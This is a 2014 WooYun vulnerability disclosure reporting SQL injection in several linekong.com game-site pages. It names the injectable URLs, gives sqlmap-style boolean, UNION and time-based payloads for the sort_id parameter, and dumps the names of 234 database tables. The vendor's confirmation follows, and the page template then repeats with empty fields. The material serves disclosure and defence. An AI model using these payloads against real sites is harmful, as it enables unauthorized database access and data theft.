蓝港在线多处存在SQL注入续 | wooyun-2014-052812| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-052812

漏洞标题：蓝港在线多处存在SQL注入续

漏洞作者： HackBraid

提交时间：2014-03-05 11:02

修复时间：2014-04-19 11:02

公开时间：2014-04-19 11:02

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-03-05：细节已通知厂商并且等待厂商处理中
2014-03-11：厂商已经确认，细节仅向厂商公开
2014-03-21：细节向核心白帽子及相关领域专家公开
2014-03-31：细节向普通白帽子公开
2014-04-10：细节向实习白帽子公开
2014-04-19：细节向公众公开

简要描述：

SQL注入，机器无故老重启，所以续。

详细说明：

注入点：
http://xy.linekong.com/wallpaper.php?sort_id=43&page=1
http://xy.linekong.com/picture.php?sort_id=44&page=1
http://xy.linekong.com/special/oneyear/index.php?article_id=1414
http://xy.linekong.com/special/war_of_camps/?article_id=1149

漏洞证明：

DB：

Place: GET
Parameter: sort_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sort_id=43) AND 3827=3827 AND (3279=3279&page=1
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: sort_id=43) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6e6d71,0x696e516a664350445852,0x716d6c6f71)#&page=1
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: sort_id=43) AND SLEEP(5) AND (7962=7962&page=1
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
current database:    'xy_web'

tables：

Database: xy_web
[234 tables]
+--------------------------------------------+
| xy_act_oldgame_log                         |
| xy_act_prize_log                           |
| xy_act_prize_log_20131224                  |
| xy_activity_10wan                          |
| xy_activity_10wan_card                     |
| xy_activity_10wan_info                     |
| xy_activity_10wan_info2nd                  |
| xy_activity_10wan_lottery                  |
| xy_activity_20100815                       |
| xy_activity_20100815_info_log              |
| xy_activity_20100815_netpas_code_log       |
| xy_activity_20100815_taobao_invite         |
| xy_activity_20100815_taobao_sales          |
| xy_activity_20100815_taobao_sales_log      |
| xy_activity_2011midautumn_ecard            |
| xy_activity_2011midautumn_items            |
| xy_activity_2011midautumn_userinfo         |
| xy_activity_300wan                         |
| xy_activity_6gift_getlog                   |
| xy_activity_6gift_log                      |
| xy_activity_6gift_sign                     |
| xy_activity_activation_log                 |
| xy_activity_army_draw_log                  |
| xy_activity_army_info                      |
| xy_activity_army_member                    |
| xy_activity_army_vote_log                  |
| xy_activity_armycreate_log                 |
| xy_activity_armygetgift_log                |
| xy_activity_back                           |
| xy_activity_beautyvote_player              |
| xy_activity_beautyvote_voter               |
| xy_activity_blissfulcard_cdkey             |
| xy_activity_blissfulcard_log               |
| xy_activity_brother_activate_log           |
| xy_activity_brother_code_log               |
| xy_activity_bysf_guestbook                 |
| xy_activity_bysf_log                       |
| xy_activity_bysf_passport                  |
| xy_activity_bysf_question                  |
| xy_activity_chit_code                      |
| xy_activity_date                           |
| xy_activity_date_log                       |
| xy_activity_duowanvip_code                 |
| xy_activity_duowanvip_log                  |
| xy_activity_familybattle_army              |
| xy_activity_familybattle_army_back         |
| xy_activity_familybattle_army_prepare      |
| xy_activity_familybattle_army_prepare_back |
| xy_activity_familybattle_armychief         |
| xy_activity_familybattle_armychief_back    |
| xy_activity_familybattle_lottery_log       |
| xy_activity_fenliulottery_log              |
| xy_activity_first_cdkey                    |
| xy_activity_first_cdkey_state              |
| xy_activity_foyuan_cdkey                   |
| xy_activity_foyuan_log                     |
| xy_activity_foyuan_message                 |
| xy_activity_getchit_log                    |
| xy_activity_gg_cdkey                       |
| xy_activity_gg_cdkey_state                 |
| xy_activity_gh_level                       |
| xy_activity_goldeneyes_cdkey               |
| xy_activity_goldeneyes_cdkey_state         |
| xy_activity_goldeneyes_dayinfo             |
| xy_activity_goldeneyes_doublekey           |
| xy_activity_guestbook                      |
| xy_activity_hopewall                       |
| xy_activity_hopewall_bless                 |
| xy_activity_huikui_answer_log              |
| xy_activity_huikui_lottery_log             |
| xy_activity_jh2_log                        |
| xy_activity_jh2_member                     |
| xy_activity_jh2_taobao                     |
| xy_activity_jh2_taobao_log                 |
| xy_activity_jh_log                         |
| xy_activity_jh_member                      |
| xy_activity_jianding_log                   |
| xy_activity_jianmianhui                    |
| xy_activity_jiaozi_log                     |
| xy_activity_joinarmy_log                   |
| xy_activity_journey_cdkey                  |
| xy_activity_journey_cdkey_state            |
| xy_activity_journey_dayinfo                |
| xy_activity_journey_gc                     |
| xy_activity_journey_gc_log                 |
| xy_activity_king_log                       |
| xy_activity_kingbattle_army                |
| xy_activity_kingbattle_army_prepare        |
| xy_activity_kingbattle_armychief           |
| xy_activity_kingbattle_lottery_log         |
| xy_activity_lostself_code_log              |
| xy_activity_lostself_exchange_log          |
| xy_activity_lostself_transfer_log          |
| xy_activity_lover                          |
| xy_activity_lv20_log                       |
| xy_activity_lv20_member                    |
| xy_activity_lv30_log                       |
| xy_activity_lv30_log1                      |
| xy_activity_lv40_card_10                   |
| xy_activity_lv40_card_30                   |
| xy_activity_lv40_log                       |
| xy_activity_lv40_member                    |
| xy_activity_lv60_log1                      |
| xy_activity_makewishes                     |
| xy_activity_makewishes_draw_log            |
| xy_activity_meeting                        |
| xy_activity_name_log                       |
| xy_activity_namegc_log                     |
| xy_activity_neg_player                     |
| xy_activity_neg_voter                      |
| xy_activity_new_act                        |
| xy_activity_newact_itemlog                 |
| xy_activity_newlottery                     |
| xy_activity_newyear_log                    |
| xy_activity_nverguo2                       |
| xy_activity_nverguo_cdkey                  |
| xy_activity_nverguo_log                    |
| xy_activity_old_player                     |
| xy_activity_oldfriends1_gift_log           |
| xy_activity_oldfriends1_verify_inviter     |
| xy_activity_oldfriends_exchange_log        |
| xy_activity_oldfriends_inviter             |
| xy_activity_oldfriends_oldplayer           |
| xy_activity_oldfriends_verify_inviter      |
| xy_activity_opg_card                       |
| xy_activity_opg_log                        |
| xy_activity_opg_turnround_card             |
| xy_activity_opg_turnround_log              |
| xy_activity_opg_user                       |
| xy_activity_package_card                   |
| xy_activity_package_card_log               |
| xy_activity_package_gift_log               |
| xy_activity_pagoda_log                     |
| xy_activity_people_vote_check              |
| xy_activity_people_vote_log                |
| xy_activity_people_vote_man_log            |
| xy_activity_privilege_card                 |
| xy_activity_privilege_log                  |
| xy_activity_qb                             |
| xy_activity_qb2nd                          |
| xy_activity_qb3rd                          |
| xy_activity_qb4th                          |
| xy_activity_qb5th                          |
| xy_activity_qb5th_bak                      |
| xy_activity_qixi                           |
| xy_activity_qmxscj_card                    |
| xy_activity_qmxscj_log                     |
| xy_activity_qqlz                           |
| xy_activity_qqlz_cdkey                     |
| xy_activity_rally_giver                    |
| xy_activity_rally_invitee                  |
| xy_activity_renzheng_log                   |
| xy_activity_rushlevel                      |
| xy_activity_shenlian_cdkey                 |
| xy_activity_shenlian_cdkey_log             |
| xy_activity_song_log                       |
| xy_activity_songfinal_userinfo             |
| xy_activity_songfinal_voteinfo             |
| xy_activity_survey_code                    |
| xy_activity_survey_log                     |
| xy_activity_survey_question                |
| xy_activity_tequan_card                    |
| xy_activity_tequan_log                     |
| xy_activity_vote_log                       |
| xy_activity_vote_query                     |
| xy_activity_welfare_cdkey                  |
| xy_activity_welfare_log                    |
| xy_activity_welfare_message                |
| xy_activity_wudidong_chongji               |
| xy_activity_wudidong_jifen                 |
| xy_activity_xunyou_ge                      |
| xy_activity_xunyou_ge_cdkey                |
| xy_activity_xunyou_log                     |
| xy_activity_xyl                            |
| xy_activity_xyvip_gift_log                 |
| xy_activity_xyvip_log                      |
| xy_activity_zhailing_cdkey                 |
| xy_activity_zhailing_log                   |
| xy_activity_zhanbu                         |
| xy_activity_zhuanpan                       |
| xy_activity_zhuanpan_voucher               |
| xy_activity_zhuanpan_voucher_log           |
| xy_activity_zhufu_bless                    |
| xy_activity_zhufu_log                      |
| xy_activity_zhufu_lottery                  |
| xy_address                                 |
| xy_article                                 |
| xy_article_demo                            |
| xy_article_inserl                          |
| xy_build                                   |
| xy_channel                                 |
| xy_columns                                 |
| xy_comment                                 |
| xy_demo                                    |
| xy_download                                |
| xy_editors_inserl                          |
| xy_flash                                   |
| xy_grading                                 |
| xy_group                                   |
| xy_image                                   |
| xy_image_inserl                            |
| xy_jnh_5173card_log                        |
| xy_jnh_gift                                |
| xy_jnh_gift_log                            |
| xy_jnh_luck                                |
| xy_jnh_luck_log                            |
| xy_jnh_passport_log                        |
| xy_jnh_receive_log                         |
| xy_login_game_history                      |
| xy_lottery_20100209_state                  |
| xy_lottery_count                           |
| xy_lottery_log                             |
| xy_mall_exchange_log                       |
| xy_mall_lottery_log                        |
| xy_member                                  |
| xy_pass_card_list                          |
| xy_pass_card_list_log                      |
| xy_passportstat                            |
| xy_sort                                    |
| xy_special_like_vote                       |
| xy_special_taici_vote                      |
| xy_taobao_voucher                          |
| xy_taobao_voucher_log                      |
| xy_template                                |
| xy_types                                   |
| xy_url                                     |
| xy_url_inserl                              |
| xy_vote                                    |
| xy_vote_inserl                             |
| xy_vote_option                             |
| xy_wj_article                              |
| xy_wj_article_inserl                       |
| xy_wj_image                                |
| xy_wj_image_inserl                         |
+--------------------------------------------+

修复方案：

你懂！

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2014-03-11 11:29

厂商回复：

已经在修补，非常感谢。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-052812

漏洞标题：蓝港在线多处存在SQL注入续

相关厂商：linekong.com

漏洞作者： HackBraid

提交时间：2014-03-05 11:02

修复时间：2014-04-19 11:02

公开时间：2014-04-19 11:02

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-052812

漏洞标题：蓝港在线多处存在SQL注入续

相关厂商：linekong.com

漏洞作者： HackBraid

提交时间：2014-03-05 11:02

修复时间：2014-04-19 11:02

公开时间：2014-04-19 11:02

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-052812"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：